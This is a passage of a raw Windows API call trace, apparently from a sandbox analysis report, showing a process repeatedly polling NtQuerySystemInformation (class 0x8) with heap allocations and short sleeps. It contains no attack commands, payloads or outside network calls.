Flags=0x0, Size=0xc0) returned 0x295ce78 [0293.390] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0293.390] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0293.397] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0293.398] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0293.398] Sleep (dwMilliseconds=0x110) [0293.406] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0293.406] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.406] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0293.406] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0293.406] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.407] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0293.407] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0293.407] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.407] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0293.408] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c838 [0293.408] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c838, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c838, ResultLength=0x19ee88*=0xc0) returned 0x0 [0293.408] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c838 | out: hHeap=0x2560000) returned 1 [0293.408] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0293.409] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0293.409] Sleep (dwMilliseconds=0x110) [0293.424] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0293.424] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.424] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0293.425] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0293.425] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.425] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0293.425] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c2b8 [0293.425] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c2b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c2b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.426] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c2b8 | out: hHeap=0x2560000) returned 1 [0293.426] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c838 [0293.426] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c838, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c838, ResultLength=0x19ee88*=0xc0) returned 0x0 [0293.427] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c838 | out: hHeap=0x2560000) returned 1 [0293.427] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0293.427] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0293.427] Sleep (dwMilliseconds=0x110) [0293.447] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0293.447] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.447] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0293.448] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ac28 [0293.448] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ac28, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ac28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.448] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ac28 | out: hHeap=0x2560000) returned 1 [0293.452] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c2b8 [0293.452] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c2b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c2b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.453] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c2b8 | out: hHeap=0x2560000) returned 1 [0293.453] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0293.453] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0293.453] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0293.453] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0293.454] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0293.454] Sleep (dwMilliseconds=0x110) [0293.470] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d868 [0293.470] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d868, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d868, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.471] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d868 | out: hHeap=0x2560000) returned 1 [0293.471] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a678 [0293.471] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a678, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a678, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.471] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a678 | out: hHeap=0x2560000) returned 1 [0293.471] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0293.471] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.472] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0293.472] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0293.472] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0293.473] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0293.473] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0293.473] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0293.473] Sleep (dwMilliseconds=0x110) [0293.486] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0293.486] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.487] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0293.487] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0293.487] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.487] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0293.488] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b770 [0293.488] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b770, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b770, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.488] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b770 | out: hHeap=0x2560000) returned 1 [0293.488] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0293.488] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0293.489] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0293.489] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0293.489] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0293.489] Sleep (dwMilliseconds=0x110) [0293.501] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0293.501] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.502] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0293.502] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0293.502] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.503] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0293.503] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0293.503] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.503] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0293.503] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0293.503] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0293.504] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0293.504] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0293.505] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0293.505] Sleep (dwMilliseconds=0x110) [0293.517] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0293.517] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.518] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0293.518] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aaf0 [0293.518] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aaf0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aaf0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.518] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aaf0 | out: hHeap=0x2560000) returned 1 [0293.518] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295be90 [0293.518] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295be90, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295be90, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.519] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295be90 | out: hHeap=0x2560000) returned 1 [0293.519] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c5e0 [0293.519] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c5e0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c5e0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0293.519] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c5e0 | out: hHeap=0x2560000) returned 1 [0293.519] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0293.520] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0293.520] Sleep (dwMilliseconds=0x110) [0293.565] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7f8 [0293.565] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7f8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7f8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.566] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7f8 | out: hHeap=0x2560000) returned 1 [0293.566] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0293.566] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.567] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0293.567] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295be90 [0293.567] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295be90, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295be90, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.567] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295be90 | out: hHeap=0x2560000) returned 1 [0293.567] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0293.567] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0293.568] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0293.568] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0293.568] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0293.569] Sleep (dwMilliseconds=0x110) [0293.575] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0293.575] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.576] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0293.579] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aaf0 [0293.580] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aaf0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aaf0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.580] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aaf0 | out: hHeap=0x2560000) returned 1 [0293.580] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bc30 [0293.580] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bc30, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bc30, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.580] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bc30 | out: hHeap=0x2560000) returned 1 [0293.581] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0293.581] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0293.581] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0293.581] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0293.581] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0293.581] Sleep (dwMilliseconds=0x110) [0293.610] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0293.610] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.611] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0293.611] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0293.611] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.611] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0293.611] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b808 [0293.612] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b808, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b808, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.612] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b808 | out: hHeap=0x2560000) returned 1 [0293.612] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0293.612] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0293.612] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0293.612] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0293.613] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0293.613] Sleep (dwMilliseconds=0x110) [0293.623] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0293.623] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.624] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0293.624] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0293.624] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.624] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0293.624] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0293.624] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.625] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0293.625] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c5e0 [0293.625] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c5e0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c5e0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0293.625] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c5e0 | out: hHeap=0x2560000) returned 1 [0293.625] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0293.626] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0293.626] Sleep (dwMilliseconds=0x110) [0293.642] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0293.642] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.643] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0293.643] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0293.643] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.643] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0293.643] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b938 [0293.643] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b938, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b938, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.644] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b938 | out: hHeap=0x2560000) returned 1 [0293.644] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0293.644] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0293.644] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0293.644] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0293.645] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0293.645] Sleep (dwMilliseconds=0x110) [0293.668] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0293.669] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.669] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0293.669] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0293.669] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.670] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0293.670] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0293.670] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.670] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0293.670] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c838 [0293.671] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c838, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c838, ResultLength=0x19ee88*=0xc0) returned 0x0 [0293.671] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c838 | out: hHeap=0x2560000) returned 1 [0293.671] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0293.671] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0293.671] Sleep (dwMilliseconds=0x110) [0293.689] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d868 [0293.689] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d868, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d868, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.690] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d868 | out: hHeap=0x2560000) returned 1 [0293.690] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0293.690] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.690] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0293.690] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0293.690] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.691] HeapFree (in: hHeap=0x2560000, 